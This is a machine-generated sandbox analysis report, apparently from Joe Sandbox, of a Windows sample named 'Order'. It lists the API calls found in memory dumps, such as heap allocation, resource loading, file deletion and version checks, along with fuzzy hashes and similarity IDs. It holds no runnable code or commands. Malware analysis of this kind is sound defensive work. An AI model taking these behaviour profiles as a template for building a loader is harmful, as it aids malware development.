                        • Part of subcall function 00405436: LeaveCriticalSection.KERNEL32(004186A8,?,?,-0000012C,00401FD4,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002), ref: 00405486
                      Memory Dump Source
                      • Source File: 00000000.00000002.1493740698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1493720788.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493763657.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493789451.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Order.jbxd
                      Similarity
                      • API ID: CriticalDirectoryRemoveSection$EnterLeaveObjectSingleTerminateThreadValueWait
                      • String ID:
                      • API String ID: 1205394408-0
                      • Opcode ID: cbf9c02a299cce853fa8afa1118c476f8ea06bf817103c663cdc69cc5dfa62d5
                      • Instruction ID: f8114c552bbb016f0a76c43bd4124e9f0fb198a1ce0b642fe03d48e839951556
                      • Opcode Fuzzy Hash: cbf9c02a299cce853fa8afa1118c476f8ea06bf817103c663cdc69cc5dfa62d5
                      • Instruction Fuzzy Hash: 36F0C030414505AADA257B32EC8299A7E36EB08308B42C43FF440714F2CF3E9D69AE5D
                      APIs
                      • HeapCreate.KERNELBASE(00000000,00001000,00000000,?,00401053,00000000,00001000,00000000,00000000), ref: 0040DE3C
                      • TlsAlloc.KERNEL32(?,00401053,00000000,00001000,00000000,00000000), ref: 0040DE47
                        • Part of subcall function 0040E6A0: HeapAlloc.KERNEL32(02310000,00000000,0000000C,?,?,0040DE57,?,00401053,00000000,00001000,00000000,00000000), ref: 0040E6AE
                        • Part of subcall function 0040E6A0: HeapAlloc.KERNEL32(02310000,00000000,00000010,?,?,0040DE57,?,00401053,00000000,00001000,00000000,00000000), ref: 0040E6C2
                        • Part of subcall function 0040E6A0: TlsSetValue.KERNEL32(0000000D,00000000,?,?,0040DE57,?,00401053,00000000,00001000,00000000,00000000), ref: 0040E6EB
                      Memory Dump Source
                      • Source File: 00000000.00000002.1493740698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1493720788.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493763657.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493789451.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Order.jbxd
                      Similarity
                      • API ID: AllocHeap$CreateValue
                      • String ID:
                      • API String ID: 493873155-0
                      • Opcode ID: f31918e335419563cb91e7816fe34751be6fcb3fb2708b1ef5dadcb8cb13decf
                      • Instruction ID: f6fb69b35e6ce2edff263c55ffd8902d3e18a9f91630c6f11d167ca4d15ccc07
                      • Opcode Fuzzy Hash: f31918e335419563cb91e7816fe34751be6fcb3fb2708b1ef5dadcb8cb13decf
                      • Instruction Fuzzy Hash: 4ED012309C8304ABE7402FB1BC0A7843B789708765F604835F509572D1D9BA6090495C
                      APIs
                      • SetFileAttributesW.KERNEL32(00000002,00000080,0040A7F2,02319778,00000000,00401FDF,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000,00000000), ref: 0040A7D0
                      • DeleteFileW.KERNELBASE(00000000,0040A7F2,02319778,00000000,00401FDF,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002), ref: 0040A7DA
                      Memory Dump Source
                      • Source File: 00000000.00000002.1493740698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1493720788.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493763657.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493789451.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Order.jbxd
                      Similarity
                      • API ID: File$AttributesDelete
                      • String ID:
                      • API String ID: 2910425767-0
                      • Opcode ID: d362f7088f03a7c0c281f2bbae1f9f88548ac7f83f4d98d140da13098a0d0c91
                      • Instruction ID: f7dd43ce8ab679ab9acf2fbd66ade7664d9bbbd5be98dbe0a51a073a4b2bc51f
                      • Opcode Fuzzy Hash: d362f7088f03a7c0c281f2bbae1f9f88548ac7f83f4d98d140da13098a0d0c91
                      • Instruction Fuzzy Hash: 00D09E30408300B6D7555B20C90D75ABAF17F84745F14C43AF485514F1D7798C65E70A
                      APIs
                      • HeapDestroy.KERNELBASE(02310000,?,004011AF,00000000,00418048,00000000,00000000,00000004,00000000,00417070,00000008,0000000C,000186A1,00000007,00417080,00418098), ref: 0040DE69
                      • TlsFree.KERNELBASE(0000000D,?,004011AF,00000000,00418048,00000000,00000000,00000004,00000000,00417070,00000008,0000000C,000186A1,00000007,00417080,00418098), ref: 0040DE76
                      Memory Dump Source
                      • Source File: 00000000.00000002.1493740698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1493720788.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493763657.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493789451.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Order.jbxd
                      Similarity
                      • API ID: DestroyFreeHeap
                      • String ID:
                      • API String ID: 3293292866-0
                      • Opcode ID: e1e86a498c82862297bb4ba2eeef0c9791047cff053e7cc11c8159107c07dceb
                      • Instruction ID: 39e23e6c0b6f630abd0a78494d594864f6bb0b6a3747c7bb50b876903a384421
                      • Opcode Fuzzy Hash: e1e86a498c82862297bb4ba2eeef0c9791047cff053e7cc11c8159107c07dceb
                      • Instruction Fuzzy Hash: 94C04C71158304ABCB049BA5FC488D57BBDE74C6153408564F51983661CA36E4408B58
                      APIs
                        • Part of subcall function 0040DFC0: TlsGetValue.KERNEL32(0000000D,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000,00000000,00000004,00000000,00417070,00000008,0000000C), ref: 0040DFD7
                        • Part of subcall function 00409BA0: RtlAllocateHeap.NTDLL(00000008,00000000,00402F00,00000200,00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000,0040439A,00000000,00000000,00000000), ref: 00409BB1
                      • GetShortPathNameW.KERNEL32(02319778,02319778,00002710), ref: 00402C34
                        • Part of subcall function 0040DE80: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040DE86
                        • Part of subcall function 0040DE80: TlsGetValue.KERNEL32(0000000D), ref: 0040DE95
                        • Part of subcall function 0040DE80: SetLastError.KERNEL32(?), ref: 0040DEAB
                        • Part of subcall function 0040DEC0: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040DECC
                        • Part of subcall function 0040DEC0: RtlAllocateHeap.NTDLL(02310000,00000000,?), ref: 0040DEF9
                        • Part of subcall function 00409B80: HeapFree.KERNEL32(00000000,00000000,00401B6B,00000000,00000000,?,00000000,00000000,00417024,00000000,00000000,?,00000000,?,00000000,00000000), ref: 00409B8C
                        • Part of subcall function 0040E020: wcslen.MSVCRT ref: 0040E037
                        • Part of subcall function 00405170: TlsGetValue.KERNEL32(?,?,00402FED,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000), ref: 00405178
                        • Part of subcall function 0040DF50: HeapFree.KERNEL32(02310000,00000000,00000000,?,00000000,?,00411DE4,00000000,00000000,-00000008), ref: 0040DF68
                      Memory Dump Source
                      • Source File: 00000000.00000002.1493740698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1493720788.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493763657.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493789451.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Order.jbxd
                      Similarity
                      • API ID: HeapValue$AllocateErrorFreeLast$NamePathShortwcslen
                      • String ID:
                      • API String ID: 192546213-0
                      • Opcode ID: 1518335539abc649e2e9bd3b93edd1db4bfbadc64f7801d47678a29de43b85a9
                      • Instruction ID: 7a2999830b1481a9d7ef80217fec4737815e267699ad494388d5f61b71452053
                      • Opcode Fuzzy Hash: 1518335539abc649e2e9bd3b93edd1db4bfbadc64f7801d47678a29de43b85a9
                      • Instruction Fuzzy Hash: F6012D75508201BAE5007BA1DD06D3F76A9EFD0718F10CD3EB944B50E2CA3D9C599A5E
                      APIs
                      • WriteFile.KERNELBASE(00000000,?,?,00000000,00000000,00000000,?,0040AA08,00000000,00000000,?,?,004033E8,00000000,00000000,00000800), ref: 0040AA67
                      Memory Dump Source
                      • Source File: 00000000.00000002.1493740698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1493720788.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493763657.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493789451.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Order.jbxd
                      Similarity
                      • API ID: FileWrite
                      • String ID:
                      • API String ID: 3934441357-0
                      • Opcode ID: da5ca93210413f8561433c219da2a3ea233fc89f057aa1d005b42788aa018882
                      • Instruction ID: b59f1f917ceac4f5cea587e7357412edb8aff685aadda2d04846933fd6210d73
                      • Opcode Fuzzy Hash: da5ca93210413f8561433c219da2a3ea233fc89f057aa1d005b42788aa018882
                      • Instruction Fuzzy Hash: 0AF09276105700AFD720DF58D948F97BBE8EB58721F10C82EE69AD3690C770E850DB61
                      APIs
                      • GetNativeSystemInfo.KERNEL32(00000000,?,00000000,00000000), ref: 00402BDD
                      Memory Dump Source
                      • Source File: 00000000.00000002.1493740698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1493720788.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493763657.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493789451.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Order.jbxd
                      Similarity
                      • API ID: InfoNativeSystem
                      • String ID:
                      • API String ID: 1721193555-0
                      • Opcode ID: f8bc963d6c34cd4fcee6a9003d89fae8e3dd4710dd3c612eeb78866044324f60
                      • Instruction ID: e96e1892c4c724b03879bd5233d00e0abab71770c233aa8573b83279bd435b66
                      • Opcode Fuzzy Hash: f8bc963d6c34cd4fcee6a9003d89fae8e3dd4710dd3c612eeb78866044324f60
                      • Instruction Fuzzy Hash: E6D0126081824986D750BE65850979BB3ECE700304F60883AD085561C1F7BCE9D99657
                      APIs
                      • RtlAllocateHeap.NTDLL(00000008,00000000,00402F00,00000200,00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000,0040439A,00000000,00000000,00000000), ref: 00409BB1
                      Memory Dump Source
                      • Source File: 00000000.00000002.1493740698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1493720788.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493763657.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493789451.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Order.jbxd
                      Similarity
                      • API ID: AllocateHeap
                      • String ID:
                      • API String ID: 1279760036-0
                      • Opcode ID: a9125dc5e6675f3a5c8ff565d637a643d225863b8cf5efdab1d921be1d17f71e
                      • Instruction ID: 6d87291edcf2eeb8e990bf82b01346f6326b2aefffcea0088477b931f0527044
                      • Opcode Fuzzy Hash: a9125dc5e6675f3a5c8ff565d637a643d225863b8cf5efdab1d921be1d17f71e
                      • Instruction Fuzzy Hash: 6EC04C717441007AD6509B24AE49F5776E9BB70702F00C4357545D15F5DB70EC50D768
                      APIs
                      • TlsFree.KERNELBASE(004011D8,004011AA,00000000,00418048,00000000,00000000,00000004,00000000,00417070,00000008,0000000C,000186A1,00000007,00417080,00418098,00000004), ref: 0040D2E1
                      Memory Dump Source
                      • Source File: 00000000.00000002.1493740698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1493720788.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493763657.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493789451.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Order.jbxd
                      Similarity
                      • API ID: Free
                      • String ID:
                      • API String ID: 3978063606-0
                      • Opcode ID: afb8170c881060827f7b708402de6715e31012ce767a183e2a7e5af61eff3ca6
                      • Instruction ID: 02f19102e46f6fc925772832a959dff7ad61b801f58b10c94ac68856fb14f403
                      • Opcode Fuzzy Hash: afb8170c881060827f7b708402de6715e31012ce767a183e2a7e5af61eff3ca6
                      • Instruction Fuzzy Hash: 04C04C30405100DBDF268B44ED0C7D53671A784305F4484BD9002112F1CB7C459CDA5C
                      APIs
                      • HeapCreate.KERNELBASE(00000000,00001000,00000000,0040106C,00000000,00001000,00000000,00000000), ref: 00409B49
                      Memory Dump Source
                      • Source File: 00000000.00000002.1493740698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1493720788.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493763657.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493789451.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Order.jbxd
                      Similarity
                      • API ID: CreateHeap
                      • String ID:
                      • API String ID: 10892065-0
                      • Opcode ID: 9eba7de511a5334458af75c1b88753425be16814361ea3c54108f6a3be7bfcb4
                      • Instruction ID: 1bee1f37f93e9d35684b03c2e4756e6010034fad4ed660fefd81427f3766245b
                      • Opcode Fuzzy Hash: 9eba7de511a5334458af75c1b88753425be16814361ea3c54108f6a3be7bfcb4
                      • Instruction Fuzzy Hash: 2AB012702C43005AF2500B105C46B8039609304B43F304024B2015A1D4CBF0108045AC
                      APIs
                      • HeapDestroy.KERNELBASE(004011DD,004011AA,00000000,00418048,00000000,00000000,00000004,00000000,00417070,00000008,0000000C,000186A1,00000007,00417080,00418098,00000004), ref: 00409B36
                      Memory Dump Source
                      • Source File: 00000000.00000002.1493740698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1493720788.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493763657.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493789451.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Order.jbxd
                      Similarity
                      • API ID: DestroyHeap
                      • String ID:
                      • API String ID: 2435110975-0
                      • Opcode ID: 9f5e47457f218c908017f92e5e7370515ba6a022eaaca9f0545f96318fbd8d58
                      • Instruction ID: ab699811fd0d87702ef007ec9d9e0afa2980276031b74f33cf565c9ea9518c6e
                      • Opcode Fuzzy Hash: 9f5e47457f218c908017f92e5e7370515ba6a022eaaca9f0545f96318fbd8d58
                      • Instruction Fuzzy Hash: 98900230404000CBCF015B10ED484843E71F74130532091749015414B0CB314451DA48
                      APIs
                        • Part of subcall function 0040DFC0: TlsGetValue.KERNEL32(0000000D,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000,00000000,00000004,00000000,00417070,00000008,0000000C), ref: 0040DFD7
                      • LoadResource.KERNEL32(00000000,00000000,00000000,00000000,00402EE4,00000000,00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000,0040439A,00000000), ref: 004026C9
                      • SizeofResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00402EE4,00000000,00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004026D9
                        • Part of subcall function 00409BA0: RtlAllocateHeap.NTDLL(00000008,00000000,00402F00,00000200,00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000,0040439A,00000000,00000000,00000000), ref: 00409BB1
                        • Part of subcall function 00409C80: memcpy.MSVCRT ref: 00409C90
                      • FreeResource.KERNEL32(?,02319778,02319778,00000000,00000000,00000000,00000000,00000000,00000000,00402EE4,00000000,00000000,0000000A,00000000,00000000,00000000), ref: 00402708
                      Memory Dump Source
                      • Source File: 00000000.00000002.1493740698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1493720788.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493763657.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493789451.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Order.jbxd
                      Similarity
                      • API ID: Resource$AllocateFreeHeapLoadSizeofValuememcpy
                      • String ID:
                      • API String ID: 4216414443-0
                      • Opcode ID: fe55d16754670a1ac2242d55fbe1307306c78159f7c22dacc8df33dc46889b7d
                      • Instruction ID: a74944ffd3112f9905740440eb7f37d3abcacb2d1106573319e1e0e6d7d597bb
                      • Opcode Fuzzy Hash: fe55d16754670a1ac2242d55fbe1307306c78159f7c22dacc8df33dc46889b7d
                      • Instruction Fuzzy Hash: 13F07471818305AFDB01AF61DD0196EBEA2FB98304F01883EF484611B1DB769828AB5A
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1493740698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1493720788.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493763657.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493789451.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Order.jbxd
                      Similarity
                      • API ID:
                      • String ID: D@A
                      • API String ID: 0-2037432845
                      • Opcode ID: 82bbbdca95c55e60409104e81861719bc6b7877ec7bc15acddf14cefadc8757b
                      • Instruction ID: 1e0778d192f5f23141dad884ed32409d8a0e2e34130d822a75cbeb00c40a84ce
                      • Opcode Fuzzy Hash: 82bbbdca95c55e60409104e81861719bc6b7877ec7bc15acddf14cefadc8757b
                      • Instruction Fuzzy Hash: BC428FB06047429FD714CF1AC58472ABBE1FF84304F148A3EE8589BB81D379E966CB95
                      APIs
                      • GetVersionExW.KERNEL32(?), ref: 004055BA
                        • Part of subcall function 00405553: memset.MSVCRT ref: 00405562
                        • Part of subcall function 00405553: GetModuleHandleW.KERNEL32(ntdll.dll,?,?,00000000), ref: 00405571
                        • Part of subcall function 00405553: GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 00405581
                      • GetVersionExW.KERNEL32(?), ref: 00405619
                      Memory Dump Source
                      • Source File: 00000000.00000002.1493740698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1493720788.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493763657.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493789451.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Order.jbxd
                      Similarity
                      • API ID: Version$AddressHandleModuleProcmemset
                      • String ID:
                      • API String ID: 3445250173-0
                      • Opcode ID: f495203579311227c63983e5ddd909674dbe6439cabb42788c76bcb90ee03a16
                      • Instruction ID: 9deb98d9ce9b1960b4761c85c685c0f6434d6ff4303ea967f2226934144b7de4
                      • Opcode Fuzzy Hash: f495203579311227c63983e5ddd909674dbe6439cabb42788c76bcb90ee03a16
                      • Instruction Fuzzy Hash: 72311F36E04E6583D6308A188C507A32294E7417A0FDA0F37EDDDB72D0D67F8D45AE8A
                      APIs
                      • SetUnhandledExceptionFilter.KERNEL32(004098F0,0040116F,00000000,00000004,00000000,00417070,00000008,0000000C,000186A1,00000007,00417080,00418098,00000004,00000000,00417070,00000008), ref: 00409A6C
                      • SetUnhandledExceptionFilter.KERNEL32(0040116F,00000000,00000004,00000000,00417070,00000008,0000000C,000186A1,00000007,00417080,00418098,00000004,00000000,00417070,00000008,00000008), ref: 00409A80
                      Memory Dump Source
                      • Source File: 00000000.00000002.1493740698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1493720788.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493763657.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493789451.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Order.jbxd
                      Similarity
                      • API ID: ExceptionFilterUnhandled
                      • String ID:
                      • API String ID: 3192549508-0
                      • Opcode ID: be8703ea72731a37991eabb093e21ce865d6a3a52a87f86e162e98d40940aa29
                      • Instruction ID: 9241775fbeca2ef236d22ba042fa6dd18ecd55e37cf60d082ab63f5987e9b773
                      • Opcode Fuzzy Hash: be8703ea72731a37991eabb093e21ce865d6a3a52a87f86e162e98d40940aa29
                      • Instruction Fuzzy Hash: CFE0A571208315EFC310CF10D888A867AB4B748741F02C43EA02992262EB348949DF1D
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1493740698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1493720788.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493763657.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493789451.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Order.jbxd
                      Similarity
                      • API ID: memcpy
                      • String ID:
                      • API String ID: 3510742995-0
                      • Opcode ID: e576844eda630fb24a4900eabb5141639e96436ababb831f4c7fee8327540495
                      • Instruction ID: d2e712a387542d9911dc411e7765b1f2c08275ba07bac0dbf1d1b28710e8a60d
                      • Opcode Fuzzy Hash: e576844eda630fb24a4900eabb5141639e96436ababb831f4c7fee8327540495
                      • Instruction Fuzzy Hash: 13D23BB2B183008FC748CF29C89165AF7E2BFD8214F4A896DE545DB351DB35E846CB86
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1493740698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1493720788.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493763657.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493789451.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Order.jbxd
                      Similarity
                      • API ID:
                      • String ID: xAA
                      • API String ID: 0-1293610936
                      • Opcode ID: 591c47f0151abaa23838d51f7b8325d4d390fbcd3a8530dac875949f81110dcc
                      • Instruction ID: 3e0955324bacc98d649988aae549d3f33f39a3fcf449ebb2edb4fadec9577cf0
                      • Opcode Fuzzy Hash: 591c47f0151abaa23838d51f7b8325d4d390fbcd3a8530dac875949f81110dcc
                      • Instruction Fuzzy Hash: EF62AF71604B129FC718CF29C59066AB7E1FFC8304F144A3EE89597B80D778E919CB95
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1493740698.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1493720788.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493763657.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493789451.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1493811504.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_Order.jbxd
                      Similarity
                      • API ID:
                      • String ID: xAA
                      • API String ID: 0-1293610936
